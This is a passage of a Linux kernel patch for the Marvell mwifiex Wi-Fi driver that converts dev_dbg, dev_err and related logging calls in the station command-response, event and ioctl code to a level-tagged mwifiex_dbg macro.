mwifiex_dbg(priv->adapter, INFO, + "info: SNMP_RESP: TxRetryCount=%u\n", + ul_temp); break; case DTIM_PERIOD_I: - dev_dbg(priv->adapter->dev, - "info: SNMP_RESP: DTIM period=%u\n", ul_temp); + mwifiex_dbg(priv->adapter, INFO, + "info: SNMP_RESP: DTIM period=%u\n", + ul_temp); default: break; } @@ -426,14 +433,15 @@ static int mwifiex_ret_tx_power_cfg(struct mwifiex_private *priv, priv->tx_power_level = (u16) pg->power_min; break; default: - dev_err(adapter->dev, "CMD_RESP: unknown cmd action %d\n", - action); + mwifiex_dbg(adapter, ERROR, + "CMD_RESP: unknown cmd action %d\n", + action); return 0; } - dev_dbg(adapter->dev, - "info: Current TxPower Level = %d, Max Power=%d, Min Power=%d\n", - priv->tx_power_level, priv->max_tx_power_level, - priv->min_tx_power_level); + mwifiex_dbg(adapter, INFO, + "info: Current TxPower Level = %d, Max Power=%d, Min Power=%d\n", + priv->tx_power_level, priv->max_tx_power_level, + priv->min_tx_power_level); return 0; } @@ -454,10 +462,10 @@ static int mwifiex_ret_rf_tx_power(struct mwifiex_private *priv, priv->min_tx_power_level = txp->min_power; } - dev_dbg(priv->adapter->dev, - "Current TxPower Level=%d, Max Power=%d, Min Power=%d\n", - priv->tx_power_level, priv->max_tx_power_level, - priv->min_tx_power_level); + mwifiex_dbg(priv->adapter, INFO, + "Current TxPower Level=%d, Max Power=%d, Min Power=%d\n", + priv->tx_power_level, priv->max_tx_power_level, + priv->min_tx_power_level); return 0; } @@ -473,18 +481,18 @@ static int mwifiex_ret_rf_antenna(struct mwifiex_private *priv, struct mwifiex_adapter *adapter = priv->adapter; if (adapter->hw_dev_mcs_support == HT_STREAM_2X2) - dev_dbg(adapter->dev, - "RF_ANT_RESP: Tx action = 0x%x, Tx Mode = 0x%04x" - " Rx action = 0x%x, Rx Mode = 0x%04x\n", - le16_to_cpu(ant_mimo->action_tx), - le16_to_cpu(ant_mimo->tx_ant_mode), - le16_to_cpu(ant_mimo->action_rx), - le16_to_cpu(ant_mimo->rx_ant_mode)); + mwifiex_dbg(adapter, INFO, + "RF_ANT_RESP: Tx action = 0x%x, Tx Mode = 0x%04x\t" + "Rx action = 0x%x, Rx Mode = 0x%04x\n", + le16_to_cpu(ant_mimo->action_tx), + le16_to_cpu(ant_mimo->tx_ant_mode), + le16_to_cpu(ant_mimo->action_rx), + le16_to_cpu(ant_mimo->rx_ant_mode)); else - dev_dbg(adapter->dev, - "RF_ANT_RESP: action = 0x%x, Mode = 0x%04x\n", - le16_to_cpu(ant_siso->action), - le16_to_cpu(ant_siso->ant_mode)); + mwifiex_dbg(adapter, INFO, + "RF_ANT_RESP: action = 0x%x, Mode = 0x%04x\n", + le16_to_cpu(ant_siso->action), + le16_to_cpu(ant_siso->ant_mode)); return 0; } @@ -502,8 +510,8 @@ static int mwifiex_ret_802_11_mac_address(struct mwifiex_private *priv, memcpy(priv->curr_addr, cmd_mac_addr->mac_addr, ETH_ALEN); - dev_dbg(priv->adapter->dev, - "info: set mac address: %pM\n", priv->curr_addr); + mwifiex_dbg(priv->adapter, INFO, + "info: set mac address: %pM\n", priv->curr_addr); return 0; } @@ -587,7 +595,8 @@ static int mwifiex_ret_802_11_key_material_v1(struct mwifiex_private *priv, if (le16_to_cpu(key->action) == HostCmd_ACT_GEN_SET) { if ((le16_to_cpu(key->key_param_set.key_info) & KEY_MCAST)) { - dev_dbg(priv->adapter->dev, "info: key: GTK is set\n"); + mwifiex_dbg(priv->adapter, INFO, + "info: key: GTK is set\n"); priv->wpa_is_gtk_set = true; priv->scan_block = false; } @@ -617,7 +626,7 @@ static int mwifiex_ret_802_11_key_material_v2(struct mwifiex_private *priv, key_v2 = &resp->params.key_material_v2; if (le16_to_cpu(key_v2->action) == HostCmd_ACT_GEN_SET) { if ((le16_to_cpu(key_v2->key_param_set.key_info) & KEY_MCAST)) { - dev_dbg(priv->adapter->dev, "info: key: GTK is set\n"); + mwifiex_dbg(priv->adapter, INFO, "info: key: GTK is set\n"); priv->wpa_is_gtk_set = true; priv->scan_block = false; } @@ -663,14 +672,14 @@ static int mwifiex_ret_802_11d_domain_info(struct mwifiex_private *priv, - IEEE80211_COUNTRY_STRING_LEN) / sizeof(struct ieee80211_country_ie_triplet)); - dev_dbg(priv->adapter->dev, - "info: 11D Domain Info Resp: no_of_triplet=%d\n", - no_of_triplet); + mwifiex_dbg(priv->adapter, INFO, + "info: 11D Domain Info Resp: no_of_triplet=%d\n", + no_of_triplet); if (no_of_triplet > MWIFIEX_MAX_TRIPLET_802_11D) { - dev_warn(priv->adapter->dev, - "11D: invalid number of triplets %d returned\n", - no_of_triplet); + mwifiex_dbg(priv->adapter, FATAL, + "11D: invalid number of triplets %d returned\n", + no_of_triplet); return -1; } @@ -680,8 +689,8 @@ static int mwifiex_ret_802_11d_domain_info(struct mwifiex_private *priv, case HostCmd_ACT_GEN_GET: break; default: - dev_err(priv->adapter->dev, - "11D: invalid action:%d\n", domain_info->action); + mwifiex_dbg(priv->adapter, ERROR, + "11D: invalid action:%d\n", domain_info->action); return -1; } @@ -843,12 +852,12 @@ static int mwifiex_ret_ibss_coalescing_status(struct mwifiex_private *priv, if (le16_to_cpu(ibss_coal_resp->action) == HostCmd_ACT_GEN_SET) return 0; - dev_dbg(priv->adapter->dev, - "info: new BSSID %pM\n", ibss_coal_resp->bssid); + mwifiex_dbg(priv->adapter, INFO, + "info: new BSSID %pM\n", ibss_coal_resp->bssid); /* If rsp has NULL BSSID, Just return..... No Action */ if (is_zero_ether_addr(ibss_coal_resp->bssid)) { - dev_warn(priv->adapter->dev, "new BSSID is NULL\n"); + mwifiex_dbg(priv->adapter, FATAL, "new BSSID is NULL\n"); return 0; } @@ -884,48 +893,48 @@ static int mwifiex_ret_tdls_oper(struct mwifiex_private *priv, case ACT_TDLS_DELETE: if (reason) { if (!node || reason == TDLS_ERR_LINK_NONEXISTENT) - dev_dbg(priv->adapter->dev, - "TDLS link delete for %pM failed: reason %d\n", - cmd_tdls_oper->peer_mac, reason); + mwifiex_dbg(priv->adapter, ERROR, + "TDLS link delete for %pM failed: reason %d\n", + cmd_tdls_oper->peer_mac, reason); else - dev_err(priv->adapter->dev, - "TDLS link delete for %pM failed: reason %d\n", - cmd_tdls_oper->peer_mac, reason); + mwifiex_dbg(priv->adapter, ERROR, + "TDLS link delete for %pM failed: reason %d\n", + cmd_tdls_oper->peer_mac, reason); } else { - dev_dbg(priv->adapter->dev, - "TDLS link delete for %pM successful\n", - cmd_tdls_oper->peer_mac); + mwifiex_dbg(priv->adapter, MSG, + "TDLS link delete for %pM successful\n", + cmd_tdls_oper->peer_mac); } break; case ACT_TDLS_CREATE: if (reason) { - dev_err(priv->adapter->dev, - "TDLS link creation for %pM failed: reason %d", - cmd_tdls_oper->peer_mac, reason); + mwifiex_dbg(priv->adapter, ERROR, + "TDLS link creation for %pM failed: reason %d", + cmd_tdls_oper->peer_mac, reason); if (node && reason != TDLS_ERR_LINK_EXISTS) node->tdls_status = TDLS_SETUP_FAILURE; } else { - dev_dbg(priv->adapter->dev, - "TDLS link creation for %pM successful", - cmd_tdls_oper->peer_mac); + mwifiex_dbg(priv->adapter, MSG, + "TDLS link creation for %pM successful", + cmd_tdls_oper->peer_mac); } break; case ACT_TDLS_CONFIG: if (reason) { - dev_err(priv->adapter->dev, - "TDLS link config for %pM failed, reason %d\n", - cmd_tdls_oper->peer_mac, reason); + mwifiex_dbg(priv->adapter, ERROR, + "TDLS link config for %pM failed, reason %d\n", + cmd_tdls_oper->peer_mac, reason); if (node) node->tdls_status = TDLS_SETUP_FAILURE; } else { - dev_dbg(priv->adapter->dev, - "TDLS link config for %pM successful\n", - cmd_tdls_oper->peer_mac); + mwifiex_dbg(priv->adapter, MSG, + "TDLS link config for %pM successful\n", + cmd_tdls_oper->peer_mac); } break; default: - dev_err(priv->adapter->dev, - "Unknown TDLS command action response %d", action); + mwifiex_dbg(priv->adapter, ERROR, + "Unknown TDLS command action response %d", action); return -1; } @@ -942,8 +951,9 @@ static int mwifiex_ret_subsc_evt(struct mwifiex_private *priv, /* For every subscribe event command (Get/Set/Clear), FW reports the * current set of subscribed events*/ - dev_dbg(priv->adapter->dev, "Bitmap of currently subscribed events: %16x\n", - le16_to_cpu(cmd_sub_event->events)); + mwifiex_dbg(priv->adapter, EVENT, + "Bitmap of currently subscribed events: %16x\n", + le16_to_cpu(cmd_sub_event->events)); return 0; } @@ -953,7 +963,7 @@ static int mwifiex_ret_cfg_data(struct mwifiex_private *priv, struct host_cmd_ds_command *resp) { if (resp->result != HostCmd_RESULT_OK) { - dev_err(priv->adapter->dev, "Cal data cmd resp failed\n"); + mwifiex_dbg(priv->adapter, ERROR, "Cal data cmd resp failed\n"); return -1; } @@ -1021,8 +1031,8 @@ int mwifiex_process_sta_cmdresp(struct mwifiex_private *priv, u16 cmdresp_no, break; case HostCmd_CMD_802_11_BG_SCAN_QUERY: ret = mwifiex_ret_802_11_scan(priv, resp); - dev_dbg(adapter->dev, - "info: CMD_RESP: BG_SCAN result is ready!\n"); + mwifiex_dbg(adapter, CMD, + "info: CMD_RESP: BG_SCAN result is ready!\n"); break; case HostCmd_CMD_TXPWR_CFG: ret = mwifiex_ret_tx_power_cfg(priv, resp); @@ -1101,8 +1111,8 @@ int mwifiex_process_sta_cmdresp(struct mwifiex_private *priv, u16 cmdresp_no, / MWIFIEX_SDIO_BLOCK_SIZE) * MWIFIEX_SDIO_BLOCK_SIZE; adapter->curr_tx_buf_size = adapter->tx_buf_size; - dev_dbg(adapter->dev, "cmd: curr_tx_buf_size=%d\n", - adapter->curr_tx_buf_size); + mwifiex_dbg(adapter, CMD, "cmd: curr_tx_buf_size=%d\n", + adapter->curr_tx_buf_size); if (adapter->if_ops.update_mp_end_port) adapter->if_ops.update_mp_end_port(adapter, @@ -1162,8 +1172,9 @@ int mwifiex_process_sta_cmdresp(struct mwifiex_private *priv, u16 cmdresp_no, ret = mwifiex_ret_sdio_rx_aggr_cfg(priv, resp); break; default: - dev_err(adapter->dev, "CMD_RESP: unknown cmd response %#x\n", - resp->command); + mwifiex_dbg(adapter, ERROR, + "CMD_RESP: unknown cmd response %#x\n", + resp->command); break; } diff --git a/drivers/net/wireless/mwifiex/sta_event.c b/drivers/net/wireless/mwifiex/sta_event.c index 0dc7a1d3993d..bed67d403c64 100644 --- a/drivers/net/wireless/mwifiex/sta_event.c +++ b/drivers/net/wireless/mwifiex/sta_event.c @@ -48,7 +48,8 @@ mwifiex_reset_connect_state(struct mwifiex_private *priv, u16 reason_code) if (!priv->media_connected) return; - dev_dbg(adapter->dev, "info: handles disconnect event\n"); + mwifiex_dbg(adapter, INFO, + "info: handles disconnect event\n"); priv->media_connected = false; @@ -104,12 +105,14 @@ mwifiex_reset_connect_state(struct mwifiex_private *priv, u16 reason_code) * it could be used for re-assoc */ - dev_dbg(adapter->dev, "info: previous SSID=%s, SSID len=%u\n", - priv->prev_ssid.ssid, priv->prev_ssid.ssid_len); + mwifiex_dbg(adapter, INFO, + "info: previous SSID=%s, SSID len=%u\n", + priv->prev_ssid.ssid, priv->prev_ssid.ssid_len); - dev_dbg(adapter->dev, "info: current SSID=%s, SSID len=%u\n", - priv->curr_bss_params.bss_descriptor.ssid.ssid, - priv->curr_bss_params.bss_descriptor.ssid.ssid_len); + mwifiex_dbg(adapter, INFO, + "info: current SSID=%s, SSID len=%u\n", + priv->curr_bss_params.bss_descriptor.ssid.ssid, + priv->curr_bss_params.bss_descriptor.ssid.ssid_len); memcpy(&priv->prev_ssid, &priv->curr_bss_params.bss_descriptor.ssid, @@ -127,9 +130,9 @@ mwifiex_reset_connect_state(struct mwifiex_private *priv, u16 reason_code) if (adapter->is_cmd_timedout && adapter->curr_cmd) return; priv->media_connected = false; - dev_dbg(adapter->dev, - "info: successfully disconnected from %pM: reason code %d\n", - priv->cfg_bssid, reason_code); + mwifiex_dbg(adapter, MSG, + "info: successfully disconnected from %pM: reason code %d\n", + priv->cfg_bssid, reason_code); if (priv->bss_mode == NL80211_IFTYPE_STATION || priv->bss_mode == NL80211_IFTYPE_P2P_CLIENT) { cfg80211_disconnected(priv->netdev, reason_code, NULL, 0, @@ -154,13 +157,13 @@ static int mwifiex_parse_tdls_event(struct mwifiex_private *priv, /* reserved 2 bytes are not mandatory in tdls event */ if (event_skb->len < (sizeof(struct mwifiex_tdls_generic_event) - sizeof(u16) - sizeof(adapter->event_cause))) { - dev_err(adapter->dev, "Invalid event length!\n"); + mwifiex_dbg(adapter, ERROR, "Invalid event length!\n"); return -1; } sta_ptr = mwifiex_get_sta_entry(priv, tdls_evt->peer_mac); if (!sta_ptr) { - dev_err(adapter->dev, "cannot get sta entry!\n"); + mwifiex_dbg(adapter, ERROR, "cannot get sta entry!\n"); return -1; } @@ -239,21 +242,21 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) switch (eventcause) { case EVENT_DUMMY_HOST_WAKEUP_SIGNAL: - dev_err(adapter->dev, - "invalid EVENT: DUMMY_HOST_WAKEUP_SIGNAL, ignore it\n"); + mwifiex_dbg(adapter, ERROR, + "invalid EVENT: DUMMY_HOST_WAKEUP_SIGNAL, ignore it\n"); break; case EVENT_LINK_SENSED: - dev_dbg(adapter->dev, "event: LINK_SENSED\n"); + mwifiex_dbg(adapter, EVENT, "event: LINK_SENSED\n"); if (!netif_carrier_ok(priv->netdev)) netif_carrier_on(priv->netdev); mwifiex_wake_up_net_dev_queue(priv->netdev, adapter); break; case EVENT_DEAUTHENTICATED: - dev_dbg(adapter->dev, "event: Deauthenticated\n"); + mwifiex_dbg(adapter, EVENT, "event: Deauthenticated\n"); if (priv->wps.session_enable) { - dev_dbg(adapter->dev, - "info: receive deauth event in wps session\n"); + mwifiex_dbg(adapter, INFO, + "info: receive deauth event in wps session\n"); break; } adapter->dbg.num_event_deauth++; @@ -265,10 +268,10 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_DISASSOCIATED: - dev_dbg(adapter->dev, "event: Disassociated\n"); + mwifiex_dbg(adapter, EVENT, "event: Disassociated\n"); if (priv->wps.session_enable) { - dev_dbg(adapter->dev, - "info: receive disassoc event in wps session\n"); + mwifiex_dbg(adapter, INFO, + "info: receive disassoc event in wps session\n"); break; } adapter->dbg.num_event_disassoc++; @@ -280,7 +283,7 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_LINK_LOST: - dev_dbg(adapter->dev, "event: Link lost\n"); + mwifiex_dbg(adapter, EVENT, "event: Link lost\n"); adapter->dbg.num_event_link_lost++; if (priv->media_connected) { reason_code = @@ -290,7 +293,7 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_PS_SLEEP: - dev_dbg(adapter->dev, "info: EVENT: SLEEP\n"); + mwifiex_dbg(adapter, EVENT, "info: EVENT: SLEEP\n"); adapter->ps_state = PS_STATE_PRE_SLEEP; @@ -298,12 +301,12 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_PS_AWAKE: - dev_dbg(adapter->dev, "info: EVENT: AWAKE\n"); + mwifiex_dbg(adapter, EVENT, "info: EVENT: AWAKE\n"); if (!adapter->pps_uapsd_mode && priv->media_connected && adapter->sleep_period.period) { adapter->pps_uapsd_mode = true; - dev_dbg(adapter->dev, - "event: PPS/UAPSD mode activated\n"); + mwifiex_dbg(adapter, EVENT, + "event: PPS/UAPSD mode activated\n"); } adapter->tx_lock_flag = false; if (adapter->pps_uapsd_mode && adapter->gen_null_pkt) { @@ -333,26 +336,26 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) case EVENT_DEEP_SLEEP_AWAKE: adapter->if_ops.wakeup_complete(adapter); - dev_dbg(adapter->dev, "event: DS_AWAKE\n"); + mwifiex_dbg(adapter, EVENT, "event: DS_AWAKE\n"); if (adapter->is_deep_sleep) adapter->is_deep_sleep = false; break; case EVENT_HS_ACT_REQ: - dev_dbg(adapter->dev, "event: HS_ACT_REQ\n"); + mwifiex_dbg(adapter, EVENT, "event: HS_ACT_REQ\n"); ret = mwifiex_send_cmd(priv, HostCmd_CMD_802_11_HS_CFG_ENH, 0, 0, NULL, false); break; case EVENT_MIC_ERR_UNICAST: - dev_dbg(adapter->dev, "event: UNICAST MIC ERROR\n"); + mwifiex_dbg(adapter, EVENT, "event: UNICAST MIC ERROR\n"); cfg80211_michael_mic_failure(priv->netdev, priv->cfg_bssid, NL80211_KEYTYPE_PAIRWISE, -1, NULL, GFP_KERNEL); break; case EVENT_MIC_ERR_MULTICAST: - dev_dbg(adapter->dev, "event: MULTICAST MIC ERROR\n"); + mwifiex_dbg(adapter, EVENT, "event: MULTICAST MIC ERROR\n"); cfg80211_michael_mic_failure(priv->netdev, priv->cfg_bssid, NL80211_KEYTYPE_GROUP, -1, NULL, GFP_KERNEL); @@ -362,7 +365,7 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_ADHOC_BCN_LOST: - dev_dbg(adapter->dev, "event: ADHOC_BCN_LOST\n"); + mwifiex_dbg(adapter, EVENT, "event: ADHOC_BCN_LOST\n"); priv->adhoc_is_link_sensed = false; mwifiex_clean_txrx(priv); mwifiex_stop_net_dev_queue(priv->netdev, adapter); @@ -371,17 +374,17 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_BG_SCAN_REPORT: - dev_dbg(adapter->dev, "event: BGS_REPORT\n"); + mwifiex_dbg(adapter, EVENT, "event: BGS_REPORT\n"); ret = mwifiex_send_cmd(priv, HostCmd_CMD_802_11_BG_SCAN_QUERY, HostCmd_ACT_GEN_GET, 0, NULL, false); break; case EVENT_PORT_RELEASE: - dev_dbg(adapter->dev, "event: PORT RELEASE\n"); + mwifiex_dbg(adapter, EVENT, "event: PORT RELEASE\n"); break; case EVENT_EXT_SCAN_REPORT: - dev_dbg(adapter->dev, "event: EXT_SCAN Report\n"); + mwifiex_dbg(adapter, EVENT, "event: EXT_SCAN Report\n"); if (adapter->ext_scan) ret = mwifiex_handle_event_ext_scan_report(priv, adapter->event_skb->data); @@ -389,7 +392,7 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_WMM_STATUS_CHANGE: - dev_dbg(adapter->dev, "event: WMM status changed\n"); + mwifiex_dbg(adapter, EVENT, "event: WMM status changed\n"); ret = mwifiex_send_cmd(priv, HostCmd_CMD_WMM_GET_STATUS, 0, 0, NULL, false); break; @@ -401,13 +404,13 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) mwifiex_send_cmd(priv, HostCmd_CMD_RSSI_INFO, HostCmd_ACT_GEN_GET, 0, NULL, false); priv->subsc_evt_rssi_state = RSSI_LOW_RECVD; - dev_dbg(adapter->dev, "event: Beacon RSSI_LOW\n"); + mwifiex_dbg(adapter, EVENT, "event: Beacon RSSI_LOW\n"); break; case EVENT_SNR_LOW: - dev_dbg(adapter->dev, "event: Beacon SNR_LOW\n"); + mwifiex_dbg(adapter, EVENT, "event: Beacon SNR_LOW\n"); break; case EVENT_MAX_FAIL: - dev_dbg(adapter->dev, "event: MAX_FAIL\n"); + mwifiex_dbg(adapter, EVENT, "event: MAX_FAIL\n"); break; case EVENT_RSSI_HIGH: cfg80211_cqm_rssi_notify(priv->netdev, @@ -416,47 +419,47 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) mwifiex_send_cmd(priv, HostCmd_CMD_RSSI_INFO, HostCmd_ACT_GEN_GET, 0, NULL, false); priv->subsc_evt_rssi_state = RSSI_HIGH_RECVD; - dev_dbg(adapter->dev, "event: Beacon RSSI_HIGH\n"); + mwifiex_dbg(adapter, EVENT, "event: Beacon RSSI_HIGH\n"); break; case EVENT_SNR_HIGH: - dev_dbg(adapter->dev, "event: Beacon SNR_HIGH\n"); + mwifiex_dbg(adapter, EVENT, "event: Beacon SNR_HIGH\n"); break; case EVENT_DATA_RSSI_LOW: - dev_dbg(adapter->dev, "event: Data RSSI_LOW\n"); + mwifiex_dbg(adapter, EVENT, "event: Data RSSI_LOW\n"); break; case EVENT_DATA_SNR_LOW: - dev_dbg(adapter->dev, "event: Data SNR_LOW\n"); + mwifiex_dbg(adapter, EVENT, "event: Data SNR_LOW\n"); break; case EVENT_DATA_RSSI_HIGH: - dev_dbg(adapter->dev, "event: Data RSSI_HIGH\n"); + mwifiex_dbg(adapter, EVENT, "event: Data RSSI_HIGH\n"); break; case EVENT_DATA_SNR_HIGH: - dev_dbg(adapter->dev, "event: Data SNR_HIGH\n"); + mwifiex_dbg(adapter, EVENT, "event: Data SNR_HIGH\n"); break; case EVENT_LINK_QUALITY: - dev_dbg(adapter->dev, "event: Link Quality\n"); + mwifiex_dbg(adapter, EVENT, "event: Link Quality\n"); break; case EVENT_PRE_BEACON_LOST: - dev_dbg(adapter->dev, "event: Pre-Beacon Lost\n"); + mwifiex_dbg(adapter, EVENT, "event: Pre-Beacon Lost\n"); break; case EVENT_IBSS_COALESCED: - dev_dbg(adapter->dev, "event: IBSS_COALESCED\n"); + mwifiex_dbg(adapter, EVENT, "event: IBSS_COALESCED\n"); ret = mwifiex_send_cmd(priv, HostCmd_CMD_802_11_IBSS_COALESCING_STATUS, HostCmd_ACT_GEN_GET, 0, NULL, false); break; case EVENT_ADDBA: - dev_dbg(adapter->dev, "event: ADDBA Request\n"); + mwifiex_dbg(adapter, EVENT, "event: ADDBA Request\n"); mwifiex_send_cmd(priv, HostCmd_CMD_11N_ADDBA_RSP, HostCmd_ACT_GEN_SET, 0, adapter->event_body, false); break; case EVENT_DELBA: - dev_dbg(adapter->dev, "event: DELBA Request\n"); + mwifiex_dbg(adapter, EVENT, "event: DELBA Request\n"); mwifiex_11n_delete_ba_stream(priv, adapter->event_body); break; case EVENT_BA_STREAM_TIEMOUT: - dev_dbg(adapter->dev, "event: BA Stream timeout\n"); + mwifiex_dbg(adapter, EVENT, "event: BA Stream timeout\n"); mwifiex_11n_ba_stream_timeout(priv, (struct host_cmd_ds_11n_batimeout *) @@ -464,28 +467,31 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_AMSDU_AGGR_CTRL: ctrl = le16_to_cpu(*(__le16 *)adapter->event_body); - dev_dbg(adapter->dev, "event: AMSDU_AGGR_CTRL %d\n", ctrl); + mwifiex_dbg(adapter, EVENT, + "event: AMSDU_AGGR_CTRL %d\n", ctrl); adapter->tx_buf_size = min_t(u16, adapter->curr_tx_buf_size, ctrl); - dev_dbg(adapter->dev, "event: tx_buf_size %d\n", - adapter->tx_buf_size); + mwifiex_dbg(adapter, EVENT, "event: tx_buf_size %d\n", + adapter->tx_buf_size); break; case EVENT_WEP_ICV_ERR: - dev_dbg(adapter->dev, "event: WEP ICV error\n"); + mwifiex_dbg(adapter, EVENT, "event: WEP ICV error\n"); break; case EVENT_BW_CHANGE: - dev_dbg(adapter->dev, "event: BW Change\n"); + mwifiex_dbg(adapter, EVENT, "event: BW Change\n"); break; case EVENT_HOSTWAKE_STAIE: - dev_dbg(adapter->dev, "event: HOSTWAKE_STAIE %d\n", eventcause); + mwifiex_dbg(adapter, EVENT, + "event: HOSTWAKE_STAIE %d\n", eventcause); break; case EVENT_REMAIN_ON_CHAN_EXPIRED: - dev_dbg(adapter->dev, "event: Remain on channel expired\n"); + mwifiex_dbg(adapter, EVENT, + "event: Remain on channel expired\n"); cfg80211_remain_on_channel_expired(&priv->wdev, priv->roc_cfg.cookie, &priv->roc_cfg.chan, @@ -496,7 +502,7 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_CHANNEL_SWITCH_ANN: - dev_dbg(adapter->dev, "event: Channel Switch Announcement\n"); + mwifiex_dbg(adapter, EVENT, "event: Channel Switch Announcement\n"); priv->csa_expire_time = jiffies + msecs_to_jiffies(DFS_CHAN_MOVE_TIME); priv->csa_chan = priv->curr_bss_params.bss_descriptor.channel; @@ -511,23 +517,23 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_TX_STATUS_REPORT: - dev_dbg(adapter->dev, "event: TX_STATUS Report\n"); + mwifiex_dbg(adapter, EVENT, "event: TX_STATUS Report\n"); mwifiex_parse_tx_status_event(priv, adapter->event_body); break; case EVENT_CHANNEL_REPORT_RDY: - dev_dbg(adapter->dev, "event: Channel Report\n"); + mwifiex_dbg(adapter, EVENT, "event: Channel Report\n"); ret = mwifiex_11h_handle_chanrpt_ready(priv, adapter->event_skb); break; case EVENT_RADAR_DETECTED: - dev_dbg(adapter->dev, "event: Radar detected\n"); + mwifiex_dbg(adapter, EVENT, "event: Radar detected\n"); ret = mwifiex_11h_handle_radar_detected(priv, adapter->event_skb); break; default: - dev_dbg(adapter->dev, "event: unknown event id: %#x\n", - eventcause); + mwifiex_dbg(adapter, ERROR, "event: unknown event id: %#x\n", + eventcause); break; } diff --git a/drivers/net/wireless/mwifiex/sta_ioctl.c b/drivers/net/wireless/mwifiex/sta_ioctl.c index a0bc26c5eac0..d8b7d9c20450 100644 --- a/drivers/net/wireless/mwifiex/sta_ioctl.c +++ b/drivers/net/wireless/mwifiex/sta_ioctl.c @@ -66,7 +66,8 @@ int mwifiex_wait_queue_complete(struct mwifiex_adapter *adapter, if (status <= 0) { if (status == 0) status = -ETIMEDOUT; - dev_err(adapter->dev, "cmd_wait_q terminated: %d\n", status); + mwifiex_dbg(adapter, ERROR, + "cmd_wait_q terminated: %d\n", status); mwifiex_cancel_all_pending_cmd(adapter); return status; } @@ -93,7 +94,8 @@ int mwifiex_request_set_multicast_list(struct mwifiex_private *priv, old_pkt_filter = priv->curr_pkt_filter; if (mcast_list->mode == MWIFIEX_PROMISC_MODE) { - dev_dbg(priv->adapter->dev, "info: Enable Promiscuous mode\n"); + mwifiex_dbg(priv->adapter, INFO, + "info: Enable Promiscuous mode\n"); priv->curr_pkt_filter |= HostCmd_ACT_MAC_PROMISCUOUS_ENABLE; priv->curr_pkt_filter &= ~HostCmd_ACT_MAC_ALL_MULTICAST_ENABLE; @@ -101,16 +103,16 @@ int mwifiex_request_set_multicast_list(struct mwifiex_private *priv, /* Multicast */ priv->curr_pkt_filter &= ~HostCmd_ACT_MAC_PROMISCUOUS_ENABLE; if (mcast_list->mode == MWIFIEX_ALL_MULTI_MODE) { - dev_dbg(priv->adapter->dev, - "info: Enabling All Multicast!\n"); + mwifiex_dbg(priv->adapter, INFO, + "info: Enabling All Multicast!\n"); priv->curr_pkt_filter |= HostCmd_ACT_MAC_ALL_MULTICAST_ENABLE; } else { priv->curr_pkt_filter &= ~HostCmd_ACT_MAC_ALL_MULTICAST_ENABLE; - dev_dbg(priv->adapter->dev, - "info: Set multicast list=%d\n", - mcast_list->num_multicast_addr); + mwifiex_dbg(priv->adapter, INFO, + "info: Set multicast list=%d\n", + mcast_list->num_multicast_addr); /* Send multicast addresses to firmware */ ret = mwifiex_send_cmd(priv, HostCmd_CMD_MAC_MULTICAST_ADR, @@ -118,9 +120,9 @@ int mwifiex_request_set_multicast_list(struct mwifiex_private *priv, mcast_list, false); } } - dev_dbg(priv->adapter->dev, - "info: old_pkt_filter=%#x, curr_pkt_filter=%#x\n", - old_pkt_filter, priv->curr_pkt_filter); + mwifiex_dbg(priv->adapter, INFO, + "info: old_pkt_filter=%#x, curr_pkt_filter=%#x\n", + old_pkt_filter, priv->curr_pkt_filter); if (old_pkt_filter != priv->curr_pkt_filter) { ret = mwifiex_send_cmd(priv, HostCmd_CMD_MAC_CONTROL, HostCmd_ACT_GEN_SET, @@ -153,7 +155,8 @@ int mwifiex_fill_new_bss_desc(struct mwifiex_private *priv, rcu_read_unlock(); if (!beacon_ie) { - dev_err(priv->adapter->dev, " failed to alloc beacon_ie\n"); + mwifiex_dbg(priv->adapter, ERROR, + " failed to alloc beacon_ie\n"); return -ENOMEM; } @@ -167,7 +170,8 @@ int mwifiex_fill_new_bss_desc(struct mwifiex_private *priv, bss_desc->bss_band = bss_priv->band; bss_desc->fw_tsf = bss_priv->fw_tsf; if (bss_desc->cap_info_bitmap & WLAN_CAPABILITY_PRIVACY) { - dev_dbg(priv->adapter->dev, "info: InterpretIE: AP WEP enabled\n"); + mwifiex_dbg(priv->adapter, INFO, + "info: InterpretIE: AP WEP enabled\n"); bss_desc->privacy = MWIFIEX_802_11_PRIV_FILTER_8021X_WEP; } else { bss_desc->privacy = MWIFIEX_802_11_PRIV_FILTER_ACCEPT_ALL; @@ -221,8 +225,8 @@ static int mwifiex_process_country_ie(struct mwifiex_private *priv, if (!strncmp(priv->adapter->country_code, &country_ie[2], 2)) { rcu_read_unlock(); - wiphy_dbg(priv->wdev.wiphy, - "11D: skip setting domain info in FW\n"); + mwifiex_dbg(priv->adapter, INFO, + "11D: skip setting domain info in FW\n"); return 0; } memcpy(priv->adapter->country_code, &country_ie[2], 2); @@ -243,8 +247,8 @@ static int mwifiex_process_country_ie(struct mwifiex_private *priv, if (mwifiex_send_cmd(priv, HostCmd_CMD_802_11D_DOMAIN_INFO, HostCmd_ACT_GEN_SET, 0, NULL, false)) { - wiphy_err(priv->adapter->wiphy, - "11D: setting domain info in FW\n"); + mwifiex_dbg(priv->adapter, ERROR, + "11D: setting domain info in FW fail\n"); return -1; } @@ -306,14 +310,15 @@ int mwifiex_bss_start(struct mwifiex_private *priv, struct cfg80211_bss *bss, if (mwifiex_11h_get_csa_closed_channel(priv) == (u8)bss_desc->channel) { - dev_err(adapter->dev, - "Attempt to reconnect on csa closed chan(%d)\n", - bss_desc->channel); + mwifiex_dbg(adapter, ERROR, + "Attempt to reconnect on csa closed chan(%d)\n", + bss_desc->channel); goto done; } - dev_dbg(adapter->dev, "info: SSID found in scan list ... " - "associating...\n"); + mwifiex_dbg(adapter, INFO, + "info: SSID found in scan list ...\t" + "associating...\n"); 